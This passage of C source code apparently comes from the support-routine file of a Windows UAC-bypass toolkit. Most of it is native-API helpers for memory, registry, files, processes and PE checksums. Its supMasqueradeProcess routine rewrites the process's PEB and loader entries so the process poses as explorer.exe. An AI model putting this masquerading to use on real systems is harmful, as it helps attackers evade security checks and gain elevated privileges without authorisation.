supEncodePointer(\n    _In_ PVOID Pointer)\n{\n    NTSTATUS Status;\n    ULONG Cookie, retLength;\n\n    if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {\n\n        Status = NtQueryInformationProcess(\n            NtCurrentProcess(),\n            ProcessCookie,\n            &Cookie,\n            sizeof(ULONG),\n            &retLength);\n\n        if (!NT_SUCCESS(Status))\n            RtlRaiseStatus(Status);\n\n        if (g_ctx)\n            g_ctx->Cookie = 
Cookie;\n\n    }\n    else {\n        Cookie = g_ctx->Cookie;\n    }\n\n#ifdef _WIN64\n    return (PVOID)(RotateRight64(\n        (ULONG_PTR)Pointer ^ Cookie,\n        Cookie & 0x3f));\n#else\n    return (PVOID)(RotateRight32(\n        (ULONG_PTR)Pointer ^ Cookie,\n        Cookie & 0x1f));\n#endif\n}\n\n/*\n* supDecodePointer\n*\n* Purpose:\n*\n* Decodes the specified pointer.\n*\n*/\nPVOID supDecodePointer(\n    _In_ PVOID Pointer)\n{\n    NTSTATUS Status;\n    ULONG Cookie, retLength;\n\n    if ((g_ctx == NULL) || (g_ctx->Cookie == 0)) {\n\n        Status = NtQueryInformationProcess(\n            NtCurrentProcess(),\n            ProcessCookie,\n            &Cookie,\n            sizeof(ULONG),\n            &retLength);\n\n        if (!NT_SUCCESS(Status))\n            RtlRaiseStatus(Status);\n\n        if (g_ctx)\n            g_ctx->Cookie = Cookie;\n\n    }\n    else {\n        Cookie = g_ctx->Cookie;\n    }\n\n#ifdef _WIN64\n    return (PVOID)(RotateRight64(\n        (ULONG_PTR)Pointer,\n        0x40 - (Cookie & 0x3f)) ^ Cookie);\n#else\n    return (PVOID)(RotateRight32(\n        (ULONG_PTR)Pointer,\n        0x20 - (Cookie & 0x1f)) ^ Cookie);\n#endif\n}\n\n/*\n* supVirtualAlloc\n*\n* Purpose:\n*\n* Wrapper for NtAllocateVirtualMemory.\n*\n*/\nPVOID supVirtualAlloc(\n    _Inout_ PSIZE_T Size,\n    _In_ ULONG AllocationType,\n    _In_ ULONG Protect,\n    _Out_opt_ NTSTATUS* Status)\n{\n    NTSTATUS status;\n    PVOID Buffer = NULL;\n    SIZE_T size;\n\n    size = *Size;\n\n    status = NtAllocateVirtualMemory(\n        NtCurrentProcess(),\n        &Buffer,\n        0,\n        &size,\n        AllocationType,\n        Protect);\n\n    if (NT_SUCCESS(status)) {\n        RtlSecureZeroMemory(Buffer, size);\n    }\n\n    *Size = size;\n    if (Status) *Status = status;\n\n    return Buffer;\n}\n\n/*\n* supVirtualFree\n*\n* Purpose:\n*\n* Wrapper for NtFreeVirtualMemory.\n*\n*/\nBOOL supVirtualFree(\n    _In_ PVOID Memory,\n    _Out_opt_ NTSTATUS* Status)\n{\n    
NTSTATUS status = STATUS_UNSUCCESSFUL;\n    SIZE_T size = 0;\n\n    status = NtFreeVirtualMemory(\n        NtCurrentProcess(),\n        &Memory,\n        &size,\n        MEM_RELEASE);\n\n    if (Status) *Status = status;\n\n    return NT_SUCCESS(status);\n}\n\n/*\n* supSecureVirtualFree\n*\n* Purpose:\n*\n* Wrapper for NtFreeVirtualMemory.\n*\n*/\nBOOL supSecureVirtualFree(\n    _In_ PVOID Memory,\n    _In_ SIZE_T MemorySize,\n    _Out_opt_ NTSTATUS* Status)\n{\n    RtlSecureZeroMemory(Memory, MemorySize);\n    return supVirtualFree(Memory, Status);\n}\n\n/*\n* supHeapAlloc\n*\n* Purpose:\n*\n* Wrapper for RtlAllocateHeap with ucmHeap.\n*\n*/\nPVOID FORCEINLINE supHeapAlloc(\n    _In_ SIZE_T Size)\n{\n    return RtlAllocateHeap(g_ctx->ucmHeap, HEAP_ZERO_MEMORY, Size);\n}\n\n/*\n* supHeapFree\n*\n* Purpose:\n*\n* Wrapper for RtlFreeHeap with ucmHeap.\n*\n*/\nBOOL FORCEINLINE supHeapFree(\n    _In_ PVOID Memory)\n{\n    return RtlFreeHeap(g_ctx->ucmHeap, 0, Memory);\n}\n\n/*\n* supIsProcess32bit\n*\n* Purpose:\n*\n* Return TRUE if given process is under WOW64, FALSE otherwise.\n*\n*/\nBOOLEAN supIsProcess32bit(\n    _In_ HANDLE hProcess\n)\n{\n    NTSTATUS status;\n    PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n\n    if (hProcess == NULL) {\n        return FALSE;\n    }\n\n    //query if this is wow64 process\n    RtlSecureZeroMemory(&pebi, sizeof(pebi));\n    pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n    status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);\n    if (NT_SUCCESS(status)) {\n        return (pebi.IsWow64Process == 1);\n    }\n    return FALSE;\n}\n\n/*\n* supGetElevationType\n*\n* Purpose:\n*\n* Returns client elevation type.\n*\n*/\nBOOL supGetElevationType(\n    _Out_ TOKEN_ELEVATION_TYPE* lpType\n)\n{\n    HANDLE hToken = NULL;\n    NTSTATUS status;\n    ULONG bytesRead = 0;\n    TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;\n\n    status = NtOpenProcessToken(GetCurrentProcess(), 
TOKEN_QUERY, &hToken);\n    if (NT_SUCCESS(status)) {\n\n        status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType,\n            sizeof(TOKEN_ELEVATION_TYPE), &bytesRead);\n\n        NtClose(hToken);\n    }\n\n    supSetLastErrorFromNtStatus(status);\n\n    if (lpType)\n        *lpType = TokenType;\n\n    return (NT_SUCCESS(status));\n}\n\n/*\n* supWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file and write buffer to it.\n*\n*/\nBOOL supWriteBufferToFile(\n    _In_ LPCWSTR lpFileName,\n    _In_opt_ PVOID Buffer,\n    _In_ DWORD BufferSize\n)\n{\n    HANDLE hFile;\n    DWORD bytesIO = 0;\n\n    if ((Buffer == NULL) || (BufferSize == 0))\n        return FALSE;\n\n    hFile = CreateFile(lpFileName,\n        GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);\n\n    if (hFile != INVALID_HANDLE_VALUE) {\n        WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);\n        CloseHandle(hFile);\n    }\n    else {\n#ifdef _DEBUG\n        supDebugPrint(TEXT(\"CreateFile\"), GetLastError());\n#endif\n        return FALSE;\n    }\n\n    return (bytesIO == BufferSize);\n}\n\n/*\n* supDebugPrint\n*\n* Purpose:\n*\n* Write formatted debug output.\n*\n*/\nVOID supDebugPrint(\n    _In_ LPCWSTR ApiName,\n    _In_ DWORD status\n)\n{\n    HANDLE Heap;\n    LPWSTR lpBuffer;\n    SIZE_T sz;\n\n    sz = MAX_PATH;\n    if (ApiName)\n        sz += _strlen(ApiName);\n\n    if (g_ctx == NULL) {\n        Heap = NtCurrentPeb()->ProcessHeap;\n    }\n    else {\n        Heap = g_ctx->ucmHeap;\n    }\n\n    lpBuffer = (LPWSTR)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, sz * sizeof(WCHAR));\n    if (lpBuffer) {\n        _strcpy(lpBuffer, TEXT(\"[UCM] \"));\n        if (ApiName) {\n            _strcat(lpBuffer, ApiName);\n        }\n        _strcat(lpBuffer, TEXT(\" code = 0x\"));\n        ultohex(status, _strend(lpBuffer));\n        _strcat(lpBuffer, TEXT(\"\\n\"));\n        OutputDebugString(lpBuffer);\n        RtlFreeHeap(Heap, 0, lpBuffer);\n    }\n\n}\n\n/*\n* 
supRegWriteValue\n*\n* Purpose:\n*\n* Write value to the registry.\n*\n*/\nNTSTATUS supRegWriteValue(\n    _In_ HANDLE hKey,\n    _In_opt_ LPWSTR ValueName,\n    _In_ DWORD ValueType,\n    _In_ PVOID ValueData,\n    _In_ ULONG ValueDataSize\n)\n{\n    UNICODE_STRING usValue;\n\n    if (ValueName) {\n\n        RtlInitUnicodeString(&usValue, ValueName);\n\n    }\n    else {\n\n        RtlInitEmptyUnicodeString(&usValue, NULL, 0);\n\n    }\n\n    return NtSetValueKey(hKey,\n        &usValue,\n        0,\n        ValueType,\n        ValueData,\n        ValueDataSize);\n}\n\n/*\n* supRegCurrentUserDeleteSubKeyValue\n*\n* Purpose:\n*\n* Remove value of the given subkey.\n*\n*/\nNTSTATUS supRegCurrentUserDeleteSubKeyValue(\n    _In_ LPWSTR SubKey,\n    _In_ LPWSTR ValueName)\n{\n    NTSTATUS ntStatus;\n    HANDLE hRootKey = NULL, hSubKey = NULL;\n    OBJECT_ATTRIBUTES obja;\n    UNICODE_STRING usSubKey, usValueName, usRootKey;\n\n    ntStatus = RtlFormatCurrentUserKeyPath(&usRootKey);\n    if (NT_SUCCESS(ntStatus)) {\n\n        InitializeObjectAttributes(&obja, &usRootKey, OBJ_CASE_INSENSITIVE, NULL, NULL);\n        ntStatus = NtOpenKey(&hRootKey, MAXIMUM_ALLOWED, &obja);\n        if (NT_SUCCESS(ntStatus)) {\n\n            RtlInitUnicodeString(&usSubKey, SubKey);\n\n            obja.RootDirectory = hRootKey;\n            obja.ObjectName = &usSubKey;\n            ntStatus = NtOpenKey(&hSubKey, MAXIMUM_ALLOWED, &obja);\n            if (NT_SUCCESS(ntStatus)) {\n                RtlInitUnicodeString(&usValueName, ValueName);\n                ntStatus = NtDeleteValueKey(hSubKey, &usValueName);\n                NtClose(hSubKey);\n            }\n\n            NtClose(hRootKey);\n        }\n\n        RtlFreeUnicodeString(&usRootKey);\n    }\n    return ntStatus;\n}\n\n/*\n* supRegReadValue\n*\n* Purpose:\n*\n* Read given value to output buffer.\n* Returned Buffer must be released with RtlFreeHeap after use.\n*\n*/\nNTSTATUS supRegReadValue(\n    _In_ HANDLE hKey,\n    _In_ LPWSTR 
ValueName,\n    _In_ DWORD ValueType,\n    _Out_ PVOID* Buffer,\n    _Out_ ULONG* BufferSize,\n    _In_opt_ HANDLE hHeap\n)\n{\n    KEY_VALUE_PARTIAL_INFORMATION* kvpi;\n    UNICODE_STRING usName;\n    NTSTATUS Status = STATUS_UNSUCCESSFUL;\n    ULONG Length = 0;\n    PVOID CopyBuffer = NULL;\n    HANDLE Heap;\n\n    *Buffer = NULL;\n    *BufferSize = 0;\n\n    if (hHeap == NULL)\n        Heap = NtCurrentPeb()->ProcessHeap;\n    else\n        Heap = hHeap;\n\n    RtlInitUnicodeString(&usName, ValueName);\n    Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, NULL, 0, &Length);\n    if (Status == STATUS_BUFFER_TOO_SMALL) {\n\n        kvpi = (KEY_VALUE_PARTIAL_INFORMATION*)RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, Length);\n        if (kvpi) {\n\n            Status = NtQueryValueKey(hKey, &usName, KeyValuePartialInformation, kvpi, Length, &Length);\n            if (NT_SUCCESS(Status)) {\n\n                if (kvpi->Type == ValueType) {\n\n                    CopyBuffer = RtlAllocateHeap(Heap, HEAP_ZERO_MEMORY, kvpi->DataLength);\n                    if (CopyBuffer) {\n                        RtlCopyMemory(CopyBuffer, kvpi->Data, kvpi->DataLength);\n                        *Buffer = CopyBuffer;\n                        *BufferSize = kvpi->DataLength;\n                        Status = STATUS_SUCCESS;\n                    }\n                    else {\n                        Status = STATUS_NO_MEMORY;\n                    }\n                }\n                else {\n                    Status = STATUS_OBJECT_TYPE_MISMATCH;\n                }\n            }\n            RtlFreeHeap(Heap, 0, kvpi);\n        }\n        else {\n            Status = STATUS_NO_MEMORY;\n        }\n    }\n\n    return Status;\n}\n\n/*\n* supReadFileToBuffer\n*\n* Purpose:\n*\n* Read file to buffer. 
Release memory when it is no longer needed.\n*\n*/\nPBYTE supReadFileToBuffer(\n    _In_ LPCWSTR lpFileName,\n    _Inout_opt_ LPDWORD lpBufferSize\n)\n{\n    NTSTATUS    status;\n    HANDLE      hFile = NULL;\n    PBYTE       Buffer = NULL;\n    SIZE_T      sz = 0;\n\n    UNICODE_STRING              usName;\n    OBJECT_ATTRIBUTES           attr;\n    IO_STATUS_BLOCK             iost;\n    FILE_STANDARD_INFORMATION   fi;\n\n    do {\n\n        if (lpFileName == NULL)\n            return NULL;\n\n        if (!RtlDosPathNameToNtPathName_U(lpFileName, &usName, NULL, NULL))\n            break;\n\n        InitializeObjectAttributes(&attr, &usName, OBJ_CASE_INSENSITIVE, 0, NULL);\n\n        status = NtCreateFile(\n            &hFile,\n            FILE_READ_DATA | SYNCHRONIZE,\n            &attr,\n            &iost,\n            NULL,\n            FILE_ATTRIBUTE_NORMAL,\n            FILE_SHARE_READ,\n            FILE_OPEN,\n            FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,\n            NULL,\n            0);\n\n        RtlFreeUnicodeString(&usName);\n\n        if (!NT_SUCCESS(status)) {\n            break;\n        }\n\n        RtlSecureZeroMemory(&fi, sizeof(fi));\n\n        status = NtQueryInformationFile(\n            hFile,\n            &iost,\n            &fi,\n            sizeof(FILE_STANDARD_INFORMATION),\n            FileStandardInformation);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        sz = (SIZE_T)fi.EndOfFile.LowPart;\n\n        Buffer = (PBYTE)supVirtualAlloc(\n            &sz,\n            DEFAULT_ALLOCATION_TYPE,\n            DEFAULT_PROTECT_TYPE,\n            &status);\n\n        if (NT_SUCCESS(status)) {\n\n            status = NtReadFile(\n                hFile,\n                NULL,\n                NULL,\n                NULL,\n                &iost,\n                Buffer,\n                fi.EndOfFile.LowPart,\n                NULL,\n                NULL);\n\n            if (NT_SUCCESS(status)) {\n                
if (lpBufferSize)\n                    *lpBufferSize = fi.EndOfFile.LowPart;\n            }\n            else {\n                supVirtualFree(Buffer, NULL);\n                Buffer = NULL;\n            }\n        }\n\n    } while (FALSE);\n\n    if (hFile != NULL) {\n        NtClose(hFile);\n    }\n\n    return Buffer;\n}\n\n/*\n* supRunProcess3\n*\n* Purpose:\n*\n* ShellExecuteEx given process with given parameters and return handle to it.\n*\n*/\nHANDLE supRunProcess3(\n    _In_ LPCWSTR lpFile,\n    _In_opt_ LPCWSTR lpParameters,\n    _In_opt_ LPCWSTR lpVerb,\n    _In_ INT nShow\n)\n{\n    SHELLEXECUTEINFO shinfo;\n\n    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n    shinfo.cbSize = sizeof(shinfo);\n    shinfo.fMask = SEE_MASK_FLAG_NO_UI | SEE_MASK_NOCLOSEPROCESS;\n    shinfo.lpFile = lpFile;\n    shinfo.lpParameters = lpParameters;\n    shinfo.nShow = nShow;\n    shinfo.lpVerb = lpVerb;\n    if (ShellExecuteEx(&shinfo))\n        return shinfo.hProcess;\n\n    return NULL;\n}\n\n/*\n* supRunProcess2\n*\n* Purpose:\n*\n* Execute given process with given parameters and wait if specified.\n*\n*/\nBOOL supRunProcess2(\n    _In_ LPCWSTR lpFile,\n    _In_opt_ LPCWSTR lpParameters,\n    _In_opt_ LPCWSTR lpVerb,\n    _In_ INT nShow,\n    _In_ ULONG mTimeOut\n)\n{\n    BOOL bResult = FALSE;\n    HANDLE hProcess = supRunProcess3(lpFile,\n        lpParameters,\n        lpVerb,\n        nShow);\n\n    if (hProcess) {\n        if (mTimeOut != 0) {\n            if (WaitForSingleObject(hProcess, mTimeOut) == WAIT_TIMEOUT)\n                TerminateProcess(hProcess, WAIT_TIMEOUT);\n        }\n        CloseHandle(hProcess);\n        bResult = TRUE;\n    }\n    return bResult;\n}\n\n/*\n* supRunProcess\n*\n* Purpose:\n*\n* Execute given process with given parameters.\n*\n*/\nBOOL supRunProcess(\n    _In_ LPCWSTR lpFile,\n    _In_opt_ LPCWSTR lpParameters\n)\n{\n    return supRunProcess2(lpFile,\n        lpParameters,\n        NULL,\n        SW_SHOW,\n        
SUPRUNPROCESS_TIMEOUT_DEFAULT);\n}\n\n/*\n* supCopyMemory\n*\n* Purpose:\n*\n* Copies bytes between buffers.\n*\n* dest - Destination buffer\n* cbdest - Destination buffer size in bytes\n* src - Source buffer\n* cbsrc - Source buffer size in bytes\n*\n*/\nvoid supCopyMemory(\n    _Inout_ void* dest,\n    _In_ size_t cbdest,\n    _In_ const void* src,\n    _In_ size_t cbsrc\n)\n{\n    char* d = (char*)dest;\n    char* s = (char*)src;\n\n    if ((dest == 0) || (src == 0) || (cbdest == 0))\n        return;\n    if (cbdest < cbsrc)\n        cbsrc = cbdest;\n\n    while (cbsrc > 0) {\n        *d++ = *s++;\n        cbsrc--;\n    }\n}\n\n/*\n* supQueryEnvironmentVariableOffset\n*\n* Purpose:\n*\n* Return offset to the given environment variable.\n*\n*/\nLPWSTR supQueryEnvironmentVariableOffset(\n    _In_ PUNICODE_STRING Value\n)\n{\n    UNICODE_STRING   str1;\n    PWCHAR           EnvironmentBlock, ptr;\n\n    EnvironmentBlock = (PWCHAR)RtlGetCurrentPeb()->ProcessParameters->Environment;\n    ptr = EnvironmentBlock;\n\n    do {\n        if (*ptr == 0)\n            return 0;\n\n        RtlInitUnicodeString(&str1, ptr);\n        if (RtlPrefixUnicodeString(Value, &str1, TRUE))\n            break;\n\n        ptr += _strlen(ptr) + 1;\n\n    } while (1);\n\n    return (ptr + Value->Length / sizeof(WCHAR));\n}\n\n/*\n* supChkSum\n*\n* Purpose:\n*\n* Calculate partial checksum for given buffer.\n*\n*/\nUSHORT supChkSum(\n    ULONG PartialSum,\n    PUSHORT Source,\n    ULONG Length\n)\n{\n    while (Length--) {\n        PartialSum += *Source++;\n        PartialSum = (PartialSum >> 16) + (PartialSum & 0xffff);\n    }\n    return (USHORT)(((PartialSum >> 16) + PartialSum) & 0xffff);\n}\n\n/*\n* supCalculateCheckSumForMappedFile\n*\n* Purpose:\n*\n* Calculate PE file checksum.\n*\n*/\nDWORD supCalculateCheckSumForMappedFile(\n    _In_ PVOID BaseAddress,\n    _In_ ULONG FileLength\n)\n{\n    PUSHORT AdjustSum;\n    PIMAGE_NT_HEADERS NtHeaders;\n    USHORT PartialSum;\n    ULONG 
CheckSum;\n\n    PartialSum = supChkSum(0, (PUSHORT)BaseAddress, (FileLength + 1) >> 1);\n\n    NtHeaders = RtlImageNtHeader(BaseAddress);\n    if (NtHeaders != NULL) {\n        AdjustSum = (PUSHORT)(&NtHeaders->OptionalHeader.CheckSum);\n        PartialSum -= (PartialSum < AdjustSum[0]);\n        PartialSum -= AdjustSum[0];\n        PartialSum -= (PartialSum < AdjustSum[1]);\n        PartialSum -= AdjustSum[1];\n    }\n    else\n    {\n        PartialSum = 0;\n    }\n    CheckSum = (ULONG)PartialSum + FileLength;\n    return CheckSum;\n}\n\n/*\n* supVerifyMappedImageMatchesChecksum\n*\n* Purpose:\n*\n* Calculate PE file checksum and compare it with checksum in PE header.\n*\n*/\nBOOLEAN supVerifyMappedImageMatchesChecksum(\n    _In_ PVOID BaseAddress,\n    _In_ ULONG FileLength\n)\n{\n    PIMAGE_NT_HEADERS NtHeaders;\n    ULONG HeaderSum;\n    ULONG CheckSum;\n\n    CheckSum = supCalculateCheckSumForMappedFile(BaseAddress, FileLength);\n\n    NtHeaders = RtlImageNtHeader(BaseAddress);\n    if (NtHeaders) {\n        HeaderSum = NtHeaders->OptionalHeader.CheckSum;\n    }\n    else {\n        HeaderSum = FileLength;\n    }\n    return (CheckSum == HeaderSum);\n}\n\n/*\n* supSetCheckSumForMappedFile\n*\n* Purpose:\n*\n* Set checksum value to PE header.\n*\n*/\nBOOLEAN supSetCheckSumForMappedFile(\n    _In_ PVOID BaseAddress,\n    _In_ ULONG CheckSum\n)\n{\n    PIMAGE_NT_HEADERS NtHeaders;\n\n    NtHeaders = RtlImageNtHeader(BaseAddress);\n    if (NtHeaders) {\n        NtHeaders->OptionalHeader.CheckSum = CheckSum;\n        return TRUE;\n    }\n    return FALSE;\n}\n\n/*\n* supLdrQueryResourceDataEx\n*\n* Purpose:\n*\n* Load resource by given id (win32 FindResource, SizeofResource, LockResource).\n*\n*/\nNTSTATUS supLdrQueryResourceDataEx(\n    _In_ ULONG_PTR ResourceId,\n    _In_ PVOID DllHandle,\n    _Out_ PULONG DataSize,\n    _Out_ PVOID* Data\n)\n{\n    NTSTATUS                   status;\n    ULONG_PTR                  IdPath[3];\n    IMAGE_RESOURCE_DATA_ENTRY* 
DataEntry;\n    ULONG                      SizeOfData = 0;\n\n    if (DataSize)\n        *DataSize = 0;\n\n    if (DllHandle == NULL) {\n        return STATUS_INVALID_PARAMETER_2;\n    }\n\n    IdPath[0] = (ULONG_PTR)RT_RCDATA; //type\n    IdPath[1] = ResourceId;           //id\n    IdPath[2] = 0;                    //lang\n\n    status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);\n    if (NT_SUCCESS(status)) {\n        status = LdrAccessResource(DllHandle, DataEntry, Data, &SizeOfData);\n        if (NT_SUCCESS(status)) {\n            if (DataSize) {\n                *DataSize = SizeOfData;\n            }\n        }\n    }\n\n    return status;\n}\n\n/*\n* supLdrQueryResourceData\n*\n* Purpose:\n*\n* Load resource by given id (win32 FindResource, SizeofResource, LockResource).\n*\n*/\nPBYTE supLdrQueryResourceData(\n    _In_ ULONG_PTR ResourceId,\n    _In_ PVOID DllHandle,\n    _Out_ PULONG DataSize\n)\n{\n    NTSTATUS status;\n    PBYTE Data = NULL;\n\n    status = supLdrQueryResourceDataEx(ResourceId,\n        DllHandle,\n        DataSize,\n        &Data);\n\n    if (NT_SUCCESS(status))\n        return Data;\n\n    return NULL;\n}\n\n/*\n* supSetLastErrorFromNtStatus\n*\n* Purpose:\n*\n* Convert last error.\n*\n*/\nVOID supSetLastErrorFromNtStatus(\n    _In_ NTSTATUS LastNtStatus\n)\n{\n    DWORD dwErrorCode;\n#ifdef _WIN64\n    dwErrorCode = RtlNtStatusToDosErrorNoTeb(LastNtStatus);\n#else\n    dwErrorCode = RtlNtStatusToDosError(LastNtStatus);\n#endif\n    SetLastError(dwErrorCode);\n}\n\nstatic PWSTR g_lpszExplorer = NULL;\n\ntypedef struct _LDR_BACKUP {\n    PWSTR ImagePathName;\n    PWSTR CommandLine;\n    PWSTR lpFullDllName;\n    PWSTR lpBaseDllName;\n} LDR_BACKUP, * PLDR_BACKUP;\n\nstatic LDR_BACKUP g_LdrBackup;\n\n/*\n* supxLdrEnumModulesCallback\n*\n* Purpose:\n*\n* LdrEnumerateLoadedModules callback.\n*\n*/\nVOID NTAPI supxLdrEnumModulesCallback(\n    _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n    _In_ PVOID Context,\n    
_Inout_ BOOLEAN* StopEnumeration\n)\n{\n    PPEB Peb = NtCurrentPeb();\n    PWSTR FullDllName, BaseDllName;\n\n    BOOL Restore = PtrToInt(Context);\n\n    if (DataTableEntry->DllBase == Peb->ImageBaseAddress) {\n\n        if (Restore) {\n            FullDllName = g_LdrBackup.lpFullDllName;\n            BaseDllName = g_LdrBackup.lpBaseDllName;\n        }\n        else {\n            g_LdrBackup.lpBaseDllName = DataTableEntry->BaseDllName.Buffer;\n            g_LdrBackup.lpFullDllName = DataTableEntry->FullDllName.Buffer;\n            FullDllName = g_lpszExplorer;\n            BaseDllName = EXPLORER_EXE;\n        }\n\n        RtlInitUnicodeString(&DataTableEntry->FullDllName, FullDllName);\n        RtlInitUnicodeString(&DataTableEntry->BaseDllName, BaseDllName);\n\n        *StopEnumeration = TRUE;\n    }\n    else {\n        *StopEnumeration = FALSE;\n    }\n}\n\n/*\n* supMasqueradeProcess\n*\n* Purpose:\n*\n* Fake/Restore current process information.\n*\n*/\nVOID supMasqueradeProcess(\n    _In_ BOOL Restore\n)\n{\n    NTSTATUS    Status;\n    PPEB        Peb = NtCurrentPeb();\n    SIZE_T      RegionSize;\n\n    PWSTR ImageFileName, CommandLine;\n\n    if (Restore == FALSE) {\n\n        g_lpszExplorer = NULL;\n        RegionSize = PAGE_SIZE;\n        Status = NtAllocateVirtualMemory(\n            NtCurrentProcess(),\n            (PVOID*)&g_lpszExplorer,\n            0,\n            &RegionSize,\n            MEM_COMMIT | MEM_RESERVE,\n            PAGE_READWRITE);\n\n        if (NT_SUCCESS(Status)) {\n            _strcpy(g_lpszExplorer, g_ctx->szSystemRoot);\n            _strcat(g_lpszExplorer, EXPLORER_EXE);\n        }\n        else {\n            supSetLastErrorFromNtStatus(Status);\n            return;\n        }\n    }\n\n    RtlAcquirePebLock();\n\n    if (Restore) {\n        CommandLine = g_LdrBackup.CommandLine;\n        ImageFileName = g_LdrBackup.ImagePathName;\n    }\n    else {\n        g_LdrBackup.ImagePathName = 
Peb->ProcessParameters->ImagePathName.Buffer;\n        g_LdrBackup.CommandLine = Peb->ProcessParameters->CommandLine.Buffer;\n\n        ImageFileName = g_lpszExplorer;\n        CommandLine = EXPLORER_EXE;\n    }\n\n    RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, ImageFileName);\n    RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, CommandLine);\n\n    if (Restore) {\n\n        RegionSize = 0;\n        NtFreeVirtualMemory(\n            NtCurrentProcess(),\n            (PVOID*)&g_lpszExplorer,\n            &RegionSize,\n            MEM_RELEASE);\n\n        g_lpszExplorer = NULL;\n\n    }\n\n    RtlReleasePebLock();\n\n    LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, IntToPtr(Restore));\n}\n\n/*\n* supExpandEnvironmentStrings\n*\n* Purpose:\n*\n* Native ExpandEnvironmentStrings.\n*\n*/\nDWORD supExpandEnvironmentStrings(\n    _In_ LPCWSTR lpSrc,\n    _In_ LPWSTR lpDst,\n    _In_ DWORD nSize\n)\n{\n    NTSTATUS Status;\n    UNICODE_STRING Source, Destination;\n    ULONG Length;\n    DWORD iSize;\n\n    if (nSize > (MAXUSHORT >> 1) - 2) {\n        iSize = (MAXUSHORT >> 1) - 2;\n    }\n    else {\n        iSize = nSize;\n    }\n\n    RtlInitUnicodeString(&Source, lpSrc);\n    Destination.Buffer = lpDst;\n    Destination.Length = 0;\n    Destination.MaximumLength = (USHORT)(iSize * sizeof(WCHAR));\n    Length = 0;\n    Status = RtlExpandEnvironmentStrings_U(NULL,\n        &Source,\n        &Destination,\n        &Length\n    );\n    if (NT_SUCCESS(Status) || Status == STATUS_BUFFER_TOO_SMALL) {\n        return (DWORD)(Length / sizeof(WCHAR));\n    }\n    else {\n        supSetLastErrorFromNtStatus(Status);\n        return 0;\n    }\n}\n\n/*\n* sxsFilePathNoSlash\n*\n* Purpose:\n*\n* Same as _filepath except it does not return the last slash.\n*\n*/\nwchar_t* sxsFilePathNoSlash(\n    const wchar_t* fname,\n    wchar_t* fpath\n)\n{\n    wchar_t* p = (wchar_t*)fname, * p0 = (wchar_t*)fname, * p1 = (wchar_t*)fpath;\n\n    if ((fname == 0) || 
(fpath == NULL))\n        return 0;\n\n    while (*fname != (wchar_t)0) {\n        if (*fname == '\\\\')\n            p = (wchar_t*)fname;\n        fname++;\n    }\n\n    while (p0 < p) {\n        *p1 = *p0;\n        p1++;\n        p0++;\n    }\n    *p1 = 0;\n\n    return fpath;\n}\n\n/*\n* sxsFindLoaderEntry\n*\n* Purpose:\n*\n* Return loader entry filename for sxs dll.\n*\n*/\nBOOL sxsFindLoaderEntry(\n    _In_ PSXS_SEARCH_CONTEXT Context\n)\n{\n    NTSTATUS Status;\n    HANDLE hDll = NULL;\n    UNICODE_STRING usDll;\n\n    PLDR_DATA_TABLE_ENTRY LdrTableEntry = NULL;\n\n    RtlInitUnicodeString(&usDll, Context->DllName);\n\n    Status = LdrGetDllHandle(\n        NULL,\n        NULL,\n        &usDll,\n        &hDll);\n\n    if (NT_SUCCESS(Status)) {\n\n        Status = LdrFindEntryForAddress(\n            hDll,\n            &LdrTableEntry);\n\n        if (NT_SUCCESS(Status)) {\n\n            if (_strstri(\n                LdrTableEntry->FullDllName.Buffer,\n                L\".local\") == NULL)\n            {\n                if (_strstri(\n                    LdrTableEntry->FullDllName.Buffer,\n                    Context->SxsKey))\n                {\n                    sxsFilePathNoSlash(\n                        LdrTableEntry->FullDllName.Buffer,\n                        Context->FullDllPath);\n\n                }\n                else\n                    Status = STATUS_NOT_FOUND;\n            }\n            else\n                Status = STATUS_TOO_LATE;\n        }\n    }\n\n    return NT_SUCCESS(Status);\n}\n\n/*\n* supxDeleteKeyRecursive\n*\n* Purpose:\n*\n* Delete key and all its subkeys/values.\n*\n*/\nBOOL supxDeleteKeyRecursive(\n    _In_ HKEY hKeyRoot,\n    _In_ LPWSTR lpSubKey)\n{\n    LPWSTR lpEnd;\n    LONG lResult;\n    DWORD dwSize;\n    WCHAR szName[MAX_PATH + 1];\n    HKEY hKey;\n    FILETIME ftWrite;\n\n    //\n    // Attempt to delete key as is.\n    //\n    lResult = RegDeleteKey(hKeyRoot, lpSubKey);\n    if (lResult == ERROR_SUCCESS)\n      
  return TRUE;\n\n    //\n    // Try to open key to check if it exists.\n    //\n    lResult = RegOpenKeyEx(hKeyRoot, lpSubKey, 0, KEY_READ, &hKey);\n    if (lResult != ERROR_SUCCESS) {\n        if (lResult == ERROR_FILE_NOT_FOUND)\n            return TRUE;\n        else\n            return FALSE;\n    }\n\n    //\n    // Add slash to the key path if not present.\n    //\n    lpEnd = _strend(lpSubKey);\n    if (*(lpEnd - 1) != TEXT('\\\\')) {\n        *lpEnd = TEXT('\\\\');\n        lpEnd++;\n        *lpEnd = TEXT('\\0');\n    }\n\n    //\n    // Enumerate subkeys and call this func for each.\n    //\n    dwSize = MAX_PATH;\n    lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, NULL,\n        NULL, NULL, &ftWrite);\n\n    if (lResult == ERROR_SUCCESS) {\n\n        do {\n\n            _strncpy(lpEnd, MAX_PATH, szName, MAX_PATH);\n\n            if (!supxDeleteKeyRecursive(hKeyRoot, lpSubKey))\n                break;\n\n            dwSize = MAX_PATH;\n\n            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 